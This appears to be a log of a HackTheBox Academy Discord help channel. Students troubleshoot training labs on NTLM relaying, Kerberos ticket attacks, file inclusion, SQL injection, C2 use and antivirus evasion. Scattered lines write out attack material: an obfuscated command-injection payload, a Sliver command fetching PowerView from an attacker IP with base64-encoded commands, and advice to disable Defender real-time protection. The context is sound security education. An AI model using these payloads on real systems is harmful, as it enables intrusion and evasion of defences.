[10/03/2025 10:22:06] Checking...
[10/03/2025 10:22:06] C:\Alpha\Static\payload.exe - OK - Undetected by Microsoft Defender Antivirus
[10/03/2025 10:23:06] Checking...
[10/03/2025 10:23:06] C:\Alpha\Static\payload.exe - OK - Undetected by Microsoft Defender Antivirus
Microsoft Defender can't detect it, but flag.txt is not being created.
Normally u get a message from airodump-ng if u caught a handshake. Did u get something?
As an alternative u can also try to use hcxdumptool instead of airodump-ng and aireplay-ng
Issues with NTLM Relay Attacks assessment, I have created a fake computer and am running the relay for ADCS, and when I run the printerbug.py. It keeps telling me that the object doesn’t exist?
That's a good point. I did not get a message saying that I caught a handshake.
I'll retry the challenge using hcxdumptool as well. Thank you!
Cool, I hope it helped you. I didn't study the module myself, but I have worked with the aircrack and hcx frameworks a bit. hcxdumptool in particular is much smarter and more modern than the aircrack framework, although it is a little more difficult to use. If you have any further questions, please feel free to ask.
Also Feel free to post the prompt you use to deauthenticate the BSSID.
module Web Fuzzing section Virtual Host and Subdomain Fuzzing
on gobuster subdomain fuzzing, parameter for dns is -do and not -d
Yes, that is the parameter for image.php. Regardless, you are right on the contact.php's 'region' parameter, that is in fact vulnerable to LFI, and from which you can trigger an uploaded shell by appending the desired command. I have done this process, and I got the " 'region' parameter contains invalid character(s) ", and after retrying it a couple times, I ended up looking at the solution, to really see if I was doing something wrong, but I did it exactly as it is contemplated. I am starting to think that there is something messed up within the skill assessment, otherwise if someone knows what could be happening, we would appreciate some help!
I'm blocked in the SQL Injection Fundamentals -Skill assessment and I see I'm not the only one.. If anybody could be a bit more precise and give some help it would be highly appreciated (tried all the payloads, used the repeater in burp, etc... but I just can't bypass the login..)
No word of a lie, I must've been hitting away at this Skills Assessment Part II for days now.
I'm completely stuck on question 8 (Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host) of this module: https://academy.hackthebox.com/module/143/section/1279
Can anyone give a hint as to how to proceed?
You can DM.
https://academy.hackthebox.com/module/249/section/2820
Guys, please did someone resolve this with Frida 17.3.1 ?
Hello, I'm in Password Attacks - Pass the Certificate. I run ntlmrelayx, and it listens. I then run printerbug.py, but I get no output at all. It just drops back to the prompt. I have tried running it with --verbose, but I get nothing. Any idea what's happening here?
Hi everyone,
I'm still stuck with the Web Fuzzing - skills assessment, can't figure what I'm doing bad since 2 days now.
I found some endpoint but nothing relevant.
If someone nice can help me, I will be grateful.
Hi guys, I'm currently working on the HTB File Inclusion Skills Assessment and could really use a hint. I've been going in circles for days now.
we all do haha
what exactly do u mean by "looking at the solution" bro?
I would have a hint for the first step LFI
would appreciate if u tell me this
DM me
This has nothing to do with HTB Academy modules.
I'm stuck on Pass the Certificate in the Password Attacks module.
I can't complete Question 2 — "What are the contents of flag.txt on Administrator's desktop?" because printerbug.py fails to obtain the .pfx, so I can't move forward. What should I do?
Hello, is this the right place to talk about pro-labs?
No, #1263635449335910531 would be the place. You'll have to follow the instructions in #welcome to get access.
Same here! Unable to progress on this one. Have tried a similar approach and a few other things but had no luck. A useful hint would be greatly appreciated. Used the cheatsheet but no luck.
Always the way as soon as you ask for help - I've made progress. DM for tip if you need.
Yes men software creppy
Tell girl not play
Men all date girl
Andress number aphone ip all
@idle shuttle you're talking gibberish. also this channel is for talk about modules. Follow the instructions in #welcome to gain access to other channels.
Thanks
I'm a beginner with basic Python skills and want to start participating in Capture The Flag (CTF) challenges. Could you guide me on how to start from scratch and improve my skills to participate in these events?
Reply please
This is the HackTheBox server. Maybe ask in the THM server.
Ok ya sorry with respect to htb only m asking
Hello guys I am doing Attacking AI - Application and System module and on the Model Deployment Tampering section. The question is:
Exploit the ShellTorch vulnerability to obtain the flag.
I have done the steps required to get a rev shell but it's still not working is it possible if I can DM someone to help me because I don't know what I'm doing wrong because my payload is the exact same as the walkthroughs
hey guys im stuck big time. Im doing the "Pass the ticket from Windows" lab but im stuck on the question "Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john" found the file but it keeps saying Access is Denied. I need help big time please:(
literally copied and pasted the walkthrough and it doesn't work???
omfg bro i just figured it out
lol
for the ACL Abuse section of AD Enumeration and Attacks module there's only one question. my issue is I am trying to add the user it tells me to add and it is saying I am entering the wrong username or password. Can someone help me out?
I need to add a user to a group to bypass the permissions of the network.
anyone able to DM?
Howdy!!! i need some help. I'm working on skills assessment on network foundations Chapter 3 : Target Acquired. After login on first terminal to use ftp after Passive mode entered and obtaining the ports for the calculation, whenever i open the 2nd terminal and try to netcat to the data channel i got message connection refused
i figured it out, was getting timeout because i was too slow :p
Anyone able to help with **nosql injection skills assessment II**?
I think you should be able to adjust the timeout for ftp
anyone else getting a 429 too many requests error on htb academy forum website...
They're sunsetting the forums.
Hi guys
in this link I think theres a mistake
it literally contradicts itself
can someone explain if Im trippin or if the actual answer is True or if theres something up with the module, please
Read the second activity on the question and the actual line again...
@mighty matrix Please take care to not post answers
ahhh just re read it, sorry for something so silly 😂 Its almost 6 am here and quite tired
In Pivoting, tunneling and port forwarding section Socat Redirection with a Reverse Shell, why is a Windows payload being created if the web server is ubuntu?
oh nvm the server is a pivot point, didnt see that part
anyone?
There's an easier way to do it.
@dull solar I know it's technically in a module but please don't spoil the method. Some people want to do it blind
And yes there is an easier way to do it than what the module shows
Alr mb.
Hey did you resolve this? I'm having the same problem
@devout lily please try not to spoil skill assessments.
sudo su
then try again
it works, how can i get back to normal user?
exit
Is hackthebox academy learning style hands-on or just text based ?
Same problem
With the text, you will learn the technique, which you can then apply in the labs
So i cant just stick with htb academy? Do i need htb labs subscription
All you need to learn is the Academy
hey guys why i can't mark certain module complete? there's no option for me to mark complete tho? i am left with like 18/19 progress
Halo
Hello,
I'm having a problem with the "Attacking Email Services" module.
I can't start the target.
What should I do?
Is there a problem with HTB Academy? The target IP address isn’t showing up.
Yes
Those wondering how to do file inclusion room, you should get rce with contact.php file i think this is enough hint. BTW another hint is that to get correct hashed name of the file that you are uploading host that application php file on your machine and get the full name of file that you would have been uploaded to htb machine
hmm
I had to change VPNs to be able to finish the module.
In the Academy room, the IP doesn’t appear for me, so I don’t even have that chance 🙁
Change the VPN server
It says all your progress will be lost. No need for that, I’ll just wait.
i cant complete the vhost module tho
no button for me to complete , i am stuck at 18/19 , like i want full progress completion on it
You might need to contact Support via the website
I dare say that most people here have been studying for more than three months.
Well, I'm new to the hacking world and this week I've been learning the basics of networking and how it works and a little bit of how to program in Python.
hello can anyone help me with academy Command Injections Advanced Command Obfuscation
- 2 Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
here is the command i am doing
127.0.0.1%0a%09$(rev<<<'dnif')%09${PATH:0:1}%09$(rev<<<'rsu')%09${PATH:0:1}$(rev<<<'erahs')%09%257C%09$(rev<<<'perg')%09$(rev<<<'toor')%09%257C%09$(rev<<<'perg')%09$(rev<<<'lqysm')%257C%09$(rev<<<'liat')%09$(rev<<<'n-')%091
Windows Evasion Module.
I have placed the perfectly fine working loader in C:\Alpha\Static\ and funny enough I can't get flag.txt generated while log.txt yields I'm back and malware works.
@dense ferry Hi.
Are the module targets having a time out for anyone else too ? I can't seem to get any to start up
Hey, am I the only not able to spawn any target system ?
same
Well, I guess, this answers my question X)
Aight cool
Helo
Why only this channel i can post in 🤔
Hello, I have a problem with spawning a target system in The Intro to Network Analysis: Guided Lab: Traffic Analysis Workflow. Yesterday, it was working quite fine but today, clicking to spawn the target system doesnt generate any IP address. Any help would be appreciated. Thank you!
Same here, can't spawn Windows privesc machines
oh, so its a widespread problem
Not sure but might be
My advice for now : Keep taking notes on the next chapter until resolved
i guess it is!
ok, thanks! will do
I've already raised a ticket just in case but Idk if they get read During the weekend
Ye me too on windows priv esc modules
Hi, is there an issue with skill assessment for pivoting and tunneling lab? When i click to spawn the target system it loads then nothing
same
same
Can always check the status page:
https://status.hackthebox.com/
Welcome to the HTB Status Page
Didn't know existed🥀
HTB Academy
Operational
It shows up, but the target isn’t working.
Well that's the platform. It does mention a systems minor outage and an issue with VPN.
Might be what is impacting you all.
You're right.
I can check a lab/SA on my end, just give me one that wasn't working that is in CPTS or CAPE path.
I saw Win Priv Esc, so lemme just try one of them.
So VPN connected on my end and Windows Priv Esc - Server Admins section lab launched and I was able to connect via RDP as per the lab instructions.
Can you please Try https://academy.hackthebox.com/module/67/section/630 I'm extremely curious now
Sure
This did spin up for me and I was able to connect via RDP. I am currently using US Academy3 for my VPN connection.
Maybe an EU thing then
Hi guys, is anyone also facing issues with the target not spawning ?
Could be
the US ones work. I was on EU while facing the spawning problem then switched to US.
Yup just confirmed it on my end after switching to an EU VPN and the target did not spawn. So if you are currently on EU it is recommended to roll to a US connection until it is fixed.
Thanks for the info.
Hello im having trouble with the final assignment of llm output attack under red team Ai. If anyone can help me, been stuck on it for days now.
how do you switch ?
hella annoying
You get sorted out?
no idk how to switch servers
Are there any problems with the target servers? I tried spawning them whole day but they're just stuck at "Target(s) are spawning..."
If using EU try switching to US. There appears to be an issue with EU assets.
Sorry its the target and not the pwnbox
Yeah same comment applies to targets. Scroll up a little and you can see what was identified a little earlier.
A friend of mine that lives in belgium is having the same issue, but i tried and it spawned. I also live in europe
guys sorry for asking here but does anyone has issues with the htb machines like i cant spawn a retired machine
same
so im not the only one good to know 😄
i thought because i just bought the vip + for the labs
ahaha can you imagine!
But yeah, seems like a lot of people are having this issue. Has anyone from HTB said anything ?
dont know anything
i was playing without the subscription and everything was fine the moment i bought i got this issues
could be that yall have some other machine spawned already ? apparently you have to terminate one before spawning another
probably server issues.. too many people having the same problem
checked it i didnt have any other machine tried this
yea hope they fix it soon
have you tried the labs or the academy ? Try both see if there's any difference. in the academy i can spawn machines
in the academy i dont have issues only with the labs i tried switching vpns there is also this help for trouble with the connections tried some steps but nothing worked
I find the whole website is kind of sluggish no? No clue bro, sorry
Welcome to the HTB Status Page
thanks
Ive heard they are doing a merge ? is that true ?
i dont know
seems like it, but they the one acquiring not the ones being acquired, so thats cool
Hello, I'm doing the Pass the Ticket (PtT) from Linux section in the Password Attacks module. I'm at the part where it's talking about "Using Linux attack tools with Kerberos" and it goes over using Chisel & Proxychains. I understand everything besides one part.
TL;DR are chisel & proxychains being used together or are they separate methods?
It says we need to configure proxychains to use socks5 & port 1080, which is used later with evil-winrm. I got that part, but my confusion is with chisel in this section. We setup a chisel server on our attack host and it uses port 8080 by default. Then we have MS01 connect to us as a chisel client.
What's the purpose of using chisel in this section? Are we using a combination of chisel & proxychains? Because I don't see proxychains or any other tool using port 8080 to utilize our chisel connection. Or is the section showing us 2 methods (proxychains OR chisel) of accomplishing this attack?
so anyone solved SQLi latest assessment so far?
Hello, in the Introduction to network, do I need to memorize all the protocols in common protocols and networking key terminology sections ?
is there anyone who can ask help for sliver C2 module, in particular Kerberos Delegation & Enumeration section
I cant spawn psexec shell to run .\Rubeus.exe monitor /interval:5 /nowrap
im trying to do unconstrained delegation attack but im afraid im missing the question point Submit the Administrator's NT hash
its good to be able to recognize them, the more you look them up, the easier you will remember them
What’s the important protocols to memorize for now
http https sql ftp
sql is a protocol??
hello, i have a problem on sliver C2 module, trying to do execute-assembly /home/kali/.sliver-client/aliases/sharpview/SharpView.exe "Get-NetUser -PreauthNotRequired" -t 240 -i -E -M but it shown an error everytime .. or this command sharpsh -- '-u http://10.10.15.159:80/PowerView.ps1 -e -c Z2V0LW5ldHVzZXIgfCBzZWxlY3QgIHNhbWFjY291bnRuYW1lLGRlc2NyaXB0aW9u'
i thought i had a output pasted somewhere brb
maybe im misremembering, but yesterday was doing lab or machine and had this port i could use
but sql is not a protocol sor, it has a port
ok damn sorry man im tired i misread ur question
so http https FTP is the important ones
tcp and udp
no, sql is a querying language. used to manage databases
implant timeout is sometimes normal. try to output in a file.
I would like to see more info.
So should I memorize HTTP HTTPS FTP UDP TCP for now ?
Because there’s a lot of protocols
1433 Yes Microsoft SQL Server database management system (MSSQL) server
1434 Yes Microsoft SQL Server database management system (MSSQL) monitor
also has port
it create a file netusers.txt
get-netuser | select samaccountname,description | out-file C:\Windows\Temp\netusers.txt
but still same error
sharpsh -- '-u http://10.10.15.159:80/PowerView.ps1 -e -c Z2V0LW5ldHVzZXIgfCBzZWxlY3Qgc2FtYWNjb3VudG5hbWUsZGVzY3JpcHRpb24gfCBPdXQtRmlsZSAtRmlsZXBhdGggQzpcV2luZG93c1xUZW1wXG5ldHVzZXJzLnR4dA=='
yeah, there's a looot of them, memorizing them all might take a while. Focus on a few common. TCP, IP, UDP, HTTP/HTTPS, SMB, FTP, SSH.. dont worry about memorizing them all, youll google a lot of it
does it put the content in netusers.txt?
Okay so just these 8
oh my bad, I didn't see the size of file.
nah 0KB no content
Microsoft SQL server. meaning a database.
as a sql db, you have MySQL, postgres, sqlite, and whatnot
honestly, these are fine to know by heart. you'll learn as you go, repetition will make the difference as well, the more you do, the more you internalize the knowledge
Get another shell from different beacon.
the pings are too damn high today
tried 3beacons i have restart the vpn 😄 i tried everything... doing it manually using 'shell' it works ..
very weird.
Windows Attacks & Defense module
where am supposed to find the wordlist rockyou.txt?
the hint says ```Use the SecLists/Passwords/Leaked-Databases/rockyou.txt password list```
but there is no such thing in my kali attack box
also when i try to ssh kali@targetip it says connection refused
Hi guys
NTLM Relay Attacks skills assessment: I was able to compromise BACKUP01$ but I am unsure how to proceed next to compromise DC01. I also cannot get the password of the sqlftp user also. Any help is greatly appreciated! Thanks!
Kali has it zipped by default, try locate -i rockyou to find the zip. Or you can just download it. https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
ty
hello guys im stuck at the new file inclusion skill assessment any hints would be appreciated
I have found two parameters p= and region= I suspect the p= is the one but nothing works i have tried fuzzing for lfi payloads none seems to work
Hi, is there anyone I can dm about LLM Output Attacks Skills Assessment ?
Hello, I'm in Password Attacks - Pass the Certificate. I run ntlmrelayx, and it listens. I then run printerbug.py, but I get no output at all. It just drops back to the prompt. I have tried running it with --verbose, but I get nothing. Any idea what's happening here?
Hi everyone I need help with the llm data attack output final assignment. Ive been stuck on getting the flag for days. If anyone can offer some guidance I would appreciate it. Thank you.
@terse sedge i believe you need to download the printerbug.py on your own kali laptop and run it from that machine not attack box, i believe that worked for me
can someone help me? im stuck on session hijacking for cross site scripting. my php code works, and i validated the payload to use, but im not getting the admin cookie
@median kettle I'm doing this from my own kali VM. Haven't tried it on attack box.
@terse sedge i assume you downloaded printerbug.py from github yeah?
I have it on my kali VM. I don't recall where I got it from.
@terse sedge sorry, im having to hunt down my notes somewhere, gimme a sec
@terse sedge 1. is the dc's ip in your etc/host file? 2. remove printerbug and download it from github (just to make sure). these are what my notes are telling me
guys in
Information Gathering - Web Edition - Skills Assessment
after executing python ReconSpider.py http://inlanefreight.htb:48743/
the results is:
cat results.json
{
"emails": [],
"links": [],
"external_files": [],
"js_files": [],
"form_fields": [],
"images": [],
"videos": [],
"audio": [],
"comments": []
}%
and cant complete the tasks, any help
Why i can't talk in general
You didn't follow the instructions in #welcome
@obsidian pawn Change your profile text please
We do not condone illegal activity
Where is the illegal activity in it?
Don't play stupid, this is your only warning
You have to link your HTB account by following the instructions outlined in the post in #welcome.
disregard i figured out my problem, haha
I tried deleting printerbug.py and downloading a new one. Now I get File "/usr/lib/python3/dist-packages/nxc/modules/printerbug.py", line 120
<title>krbrelayx/printerbug.py at master · dirkjanm/krbrelayx · GitHub</title>
^
SyntaxError: invalid character '·' (U+00B7)
You probably didn't download the raw file and instead downloaded the github page that contained the file
Because your error message has html tags in it
I did this: sudo wget https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
visit that page
you can see it's not raw python, it's a html page
click the "raw" or "download" button to get it on your link
also no need to sudo to wget
Looks like that worked. I still had to use sudo. I kept getting access denied messages.
Hi guys, got a question
After installing the Parrot OS I can't find the tools list like shown in the picture
Which tool list are you looking for, and which image are you referring to?
The tools list they refer to in the middle of the page:
tools.list
after upgrading and updating the system
most of the tools are installed but are to be found on usr/bin
This is a list created by the author. It is not included in the system.
need help with C2 operations with sliver module 🙁
I am stuck at task 7. any one who can help me get rid of from here, please?
https://app.hackthebox.com/sherlocks/Payload
Kerberos Delegation & Enumeration section, I dont understand what I need to do, if I need to exploit unconstrained delegation, psexec doesnt work to use rubeus monitor command
You might get more help in the #sherlocks channel.
I think you should be able to follow along with the section material. You can DM what you have setup and what you are trying.
@gray yacht thx
I'm having a lot of issues with the Introduction to Digital Forensics module. I'm trying to do the exercise in the Evidence Acquisition Techniques & Tools section.
I need to connect to an IP address through RDP. This is the first step of the exercise. My VPN is switched on and my first command is a ping to the IP. The ping is successful.
Then I write: "xfreerdp3 /u:Administrator /v:IP-Address"
It will prompt me to give a password, which I give. A new window opens and I log in, but a few seconds after getting access, it completely crashes. The window disappears and the instance dies (can't be pinged anymore)
I have tried this 3 times already and I can't get it to work. What's the issue here? I can't solve it on my side it seems. Is the remote instance broken?
In Password Attacks - Pass the Certificate, when running impacket-ntlmrelayx, I get the following errors:
Exception in thread Thread-6:
Traceback (most recent call last):
  File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
    self.run()
    ~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
    ADCSAttack._run(self)
    ~~~~~~~~~~~~~~~^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
    certificate_store = self.generate_pfx(key, certificate)
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
    p12 = crypto.PKCS12()
          ^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
    obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12
What could this mean?
Quick Google search of AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12:
https://github.com/fortra/impacket/issues/1716
You can try switching VPN protocols and regions to see if that fixes things on your end.
any help on the machine DarkZero would be appreciated, any small hint : )
Best to ask in #1424092683793727589. You'll need to follow the instructions in #welcome to get access to the channel.
@crimson moon Please do not reveal contents of modules above tier 0, especially attack paths in skill assessments. you were on the right track.
Sorry about that how do I obfuscate info? I’m noob in discord
Just say what you're stuck on, module, section, question. If you feel like you need to reveal more detail you can take it to DM, but remember anyone who has done it doesn't need details because they know the way to do it already.
Ok gotcha
Hello everyone can someone confirm whether the sql injection fundamental assessment is working fine and solvable trying for 2 still no clue
It works
Can someone provide a hint for solving this sql injection fundamental assessment.
hello can anyone kindly help me on this -module-Web Fuzzing -Recursive Fuzzing- stuck in this
it's quite frustrating that I could not get to the machine using smbclient. Is there anything wrong with the server or what did I do wrong?
well the error says it's timing out. is this the pwnbox, or your own vm? are you running the pwnbox and a vm at the same time?
I've been struggling with this one too. Help would be appreciated
Can someone help a girl out
Prolabs aren't multiplayer. Also #1263635449335910531, follow the instructions in #welcome to get access to most of the server.
Just ask your question, make sure to state which module section and question you're on.
Hey Everyone I need help_!
any quick way to validate passive subdomains at scale (50–200 domains) without making noise? Just need 2–3 real commands you trust for clean validation before scanning.
Best to say which module, section, and question you're on.
May I DM you?
Sure!
Hey guys, I need help:
Module: Pivoting, Tunneling, Port Forwarding
Section: RDP and SOCKS Tunneling with SocksOverRDP
Problem: I transferred the SocksOverRDP-x64.zip to the Windows pivot host and then unzipped it and tried to do the regsvr32.exe SocksOverRDP-Plugin.dll command but kept getting this error. This didn't happen in the example so wondering where I went wrong
Any advice?
disable real time protection
Where u at right now
In sql injection fundamental skill assessment I was able to bypass register page and able to log in but after login there is only one request I found vulnerable to sql injection that too is not actual sql injection parameter by which I can get info because that is time based sql injection so if anyone has any hint let me know
Hello HTB,
My subscription is expiring soon and I don't plan to renew for now.
I have some modules that I started and haven't completed yet. Do I lose access to them when my subscription ends ?
Thx !
You only keep modules you completed
I cant even create new account getting error like invalid validation code
Try to bypass it via sql
@fathom pendant can you kindly help me on this -module-Web Fuzzing -Recursive Fuzzing- stuck in this
May I ?
yes please , can i DM ? my command on recursive fuzzing is running for few hours i want a clarification on it , Thank you
Sure
Nope, it's still not working
Hey everyone 👋 I’m currently working on the XSS module, but I’m a bit stuck — when I try <script>alert(document.cookie)</script>, nothing pops up (no alert). Anyone know what I might be missing?
Huhu, Footprinting was fun. I have a little Problem i cant complete Footprinting/ MySql. I Have the right answer and it is Green but i cant Mark Complete :). Had anyone this Problem ?
DM'd you check it
Is it dom based?
Yes, it is
You can open a support ticket to report your issues. I haven't worked through that module/section, so I don't know if there is something else going on that you could do on your end.
I have tried to do hard refresh but still nothing. Can it be related to modern browser ?
I don’t think so but still try with burp inbuilt chromium it may work
Thanks a lot, it worked.
This is not that type of server.
Oh
hello guys Im doing the new sql injection fundamentals skill assessment i managed to bypass the login page via reusing the invitation code and im stuck now any help?
Hello guys do you think HTB Academy content is enough to get the cpts certification (for a beginner) ??
#cpts and doing only modules is not enough, you need to practice.
You should start with CJCA to have a good start and then do CWES or CPTS.
Yes, but you'll need to have a sharp methodology to pass.
I'd say do some prolabs before going into the exam.
You can see the related ones to CPTS from the Academy x HTB Labs section.
and also machines
Ok i think i need to finish the cjca modules before cpts
Is anyone's spawning VM interacting function doesn't work? I'm getting This site can’t be reached Check if there is a typo in vnc.htb-cloud.com
Hi folks, I'm not a java expert but I can tell when I'm doing something wrong - in the 3-tier Thick Application stage of Attacking Common Applications, I'm following the instructions on the page. When I rebuild the "traverse.jar" file, it appears a much smaller size than the original file(s) and does nothing when I run it. I've gone wrong somewhere and it feels like a java knowledge gap rather than anything else - any suggestions?
I need some help with AEN. My bloodhound is not showing the same thing that is in the walkthrough despite trying multiple different ingestion methods.
Well, the versions of BloodHound have probably changed in the meantime too.
Information Gathering - Web Edition - dig
Hi everyone, i dont see the message "Spawn the target" in the exercise section, why?
This is what i am seeing
Hello, I'm not sure to understand this note from the Pass the Ticket from Windows section in the Password Attack module:
Note: At the time of writing, using Mimikatz version 2.2.0 20220919, if we run sekurlsa::ekeys it presents all hashes as des_cbc_md4 on some Windows 10 versions. Exported tickets (sekurlsa::tickets /export) do not work correctly due to the wrong encryption. It is possible to use these hashes to generate new tickets or use Rubeus to export tickets in Base64 format.
Can someone explain me ?
You don't need to spawn target. The domain is available on the Internet Network.
Hey can someone help me with the lolbins module I'm windows evasion path I've been trying to get a shell and all for so long but Nthg is working
Need help with Documentation & Reporting Practice Lab
Every time i try to import into bloodhound I get a failure. Ive tried multiple times to retrieve the data and even spun up a new Kali box to see if that could be the error.
Did you use the right ingestor? It must match the BloodHound version.
its the one that was preinstalled with the lab that was spun up
This version is probably not compatible with your BloodHound.
alright. so I need to investigate how to either update the lab or downgrade bloodhound
If you use BloodHound CE, you can download the correct ingestor directly in BloodHound.
Do you work with PwnBox? No idea what's preinstalled here.
no ive been running my own kali box in preparation of the CPTS
if you recommend to use the pwnbox, I will use it. this is the last question for the enter path
No, I do not recommend the PWN Box.
If you use Kali, install the latest version of BloodHound CE and then download the correct ingestor from there, or use NetExec.
thanks. I will see what I can figure out. been working on this seemingly simple question for a week now. never considered the difference in versions
now when I put the new bloodhound files as a zip on the desktop of the attack box I lose rdp and cant reconnect....
The walkthrough shows a certain attack that is possible but mine does not.
Any recommendations?
yea this is getting very frustrating, resetting the box for the 3rd time today
just reset everything again and lost connection without doing anything....
Which version are you using, and which version was used in the walkthrough?
Greetings everyone, I'm a little stuck with the new Skills Assessment - File Inclusion. Has anyone solved it who can give me some guidance?
I tried everything and all says that the uid is 1000 but the system disagrees. Anybody know why?
Already did. Nothing.
so much for a new version of the collector going to just search the web for the answer
What do you use to create the .zip file ?
Sharphound or bloodhound-python ?
And which version of Bloodhound Legacy are you using ?
Oh ... CE ... Sorry not familiar with it.
Did you try to use the Sharphound that comes with it ?
You need this Version for BloodHound CE
Yep, that's the version for CE
Or just use NetExec
let me try again. last time it wanted to update dependencies on the attack box which it cant do because the attack box cant get on the internet
Not sure if it's supported in CE, but try to unzip the file and ingest a file at a time
yea that is the version I tried, it wanted to update python which it cant do
Greetings everyone, I'm a little stuck with the new Skills Assessment - File Inclusion. Has anyone solved it who can give me some guidance? Let me now, please
ForP44 - getting file ingestion errors
Nothing also saying 1000 is uid
On every single file ? @vapid maple
Have you tried to use the sharphound.exe that comes with CE ?
In Bloodhound CE ... there is a way to "create" the sharphound.exe
let me see what i can figure out
He said file ingestion errors
There is an option "Download Collectors" in CE which will give a sharphound.zip @vapid maple
Unzip it and transfer the .exe to the target.
Then run it and try to ingest that zip file in your CE.
I dont see that option in CE, let me search for it
but you cant run an .exe on a linux box...
Oh ... the target is a linux.
Welp, try netexec ldap --bloodhound ?
getting a 404, guess that wont work. guess blood hound isnt installed correctly on this kali box
help with windows attack and defense kerberoasting module?
@Decoy I am using the Bloodhound legacy 4.3.1 version so I can't help with newer stuff.
Im walking away for a bit, getting too frustrated at this box. again. Thank you all for your help
good luck
Umm which path is that ?
security analyst
Haven't done it ... But take your shot, someone might help. Explain what you've done
There are two endpoints that are vulnerable to lfi use one to read file on system because on this one you will not get rce, and use the other endpoint to get rce
I tried everything in every format.... Still nothing
Have you tried something like index.php?page=../../../../etc/passwd ? @river stream
Why is it only here i can post? Do I need to sub to get access other channels?
After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user? ...this is the question...getting nearly a hundred thousand results. any help
It's a new test, the attack vectors are no longer the same, there are two potential LFIs, I got the first one, but the second one seems to require the evasion of a rather particular filter.
Oh they change it
How will that help me get the UID?
Just read and follow #welcome
Yeah sir...
still says incorrect answer
I'm in Password Attacks - Pass the Certificate - Getting errors when I run gettgtpkinit.py:
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
    ~~~~^^
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
    ~~~~~^^^^^^
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 302, in amain
    ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams)
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 47, in from_pfx
    with open(pfxfile, 'rb') as f:
         ~~~~^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '../krbrelayx/DC01$.pfx'
The last line really doesn't make any sense, since impacket-ntlmrelayx ran before this, and says it wrote the cert successfully. Any ideas?
Guys any tips in how I can install ubuntu ✌️💔🥀
Yea ik that
But like the hardware part 💔💔
Hello chat
.
Help me with installing Linux. 💔
I'm dumber than you
twin
Go watch tuts it's easzzzzzy
This isn't the channel for that. This channel is dedicated for discussion of the various modules HTB has to offer.
Yea sure.. mb but why can't I speak in general?
Dude can anyone help me with question 3 in the module assessment on using web proxies? Its the question on the decoded md5 cookie, they want you to fuzz the missing last character of the cookie using alphanum.txt
I'm in Password Attacks - Pass the Certificate - Getting errors when I run gettgtpkinit.py:
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
    ~~~~^^
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
    ~~~~~^^^^^^
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 302, in amain
    ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams)
  File "/home/kali/PKINITtools/gettgtpkinit.py", line 47, in from_pfx
    with open(pfxfile, 'rb') as f:
         ~~~~^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '../krbrelayx/DC01$.pfx'
The last line really doesn't make any sense, since impacket-ntlmrelayx ran before this, and says it wrote the cert successfully. Any ideas?
I know I had some errors on that assessment and had to create a separate virtual environment for the PKINIT tools @terse sedge
Also, maybe try and give the full path instead of a relative one
@remote merlin try and use Burp ... If I remember correctly, first you need to append a char to the cookie, encode it and then send that request
Hey do any of y’all sell services
White-hats in here I'm afraid @azure basalt
I'm not sure what the full path would be. ntlmrelayx doesn't show the full path, just ../DCO1$.pfx
What type of service are you trying to purchase ? @azure basalt
Modding a game
Yeah, well ... I believe you need its exact location @terse sedge
@azure basalt This channel is for modules from the HTB Academy.
Interesting
ok ill give that a shot
😉
Do you know any that could help
Not really, nope.
Oh ok
Hey you can DM your inputs and outputs unless you already got this sorted out.
Just giving a shoutout to @fossil jacinth thanks for pushing me back to use Burp suite for this task. It really worked, along with this article that helps with understanding the rest of the assessment I also give a shoutout to the author of this article. https://medium.com/@mxq164/web-proxy-skill-assessment-htb-0eb3b96e2f00 If anyone else needs help with it.
Are there more people who are stuck on the Skills Assessment - File Inclusion?
Having a hard time understanding where the application file is stored. Am I overlooking anything in the environment itself or in the reading material? Going crazy right now
search the discord channel you'll probably find your answer
Hey
Hey, in the web request model second sections. the curl -k is not working. I did curl -h and didnt see -k so im not sure if thats a command in curl
Hey everyone it's actually rude not welcoming your newest fan/member
does anyone have the issue with " Information Gathering - Web Edition " module?
you can't really click the full complete button
Like there's no button for you to fully complete the specific module "vhost "
Can anyone help
HTTPS doesn’t work with curl
What is the error message that you are seeing from curl
no output
Okay, what is the command you are running
Im about to start a wifi based module and I bought an AWUS036NHA and downloaded the drivers but can't get it to work on linux VM or on windows. Does anyone know if it is too old?
Help
You don't need your own adapter for the wifi modules. They are all self contained and you can practice from the target.
Can u help me
Double check the command you are running and the one in the section
I’m having issues with the question in Web Request module. It asks me to download the page on the following path /download.php
The command i use is:
curl ip:port/download.php
But nothing happens
Try to add "http://" before ip
Why
I just tried and it worked
but also worked without "http://"
can u ping to the ip?
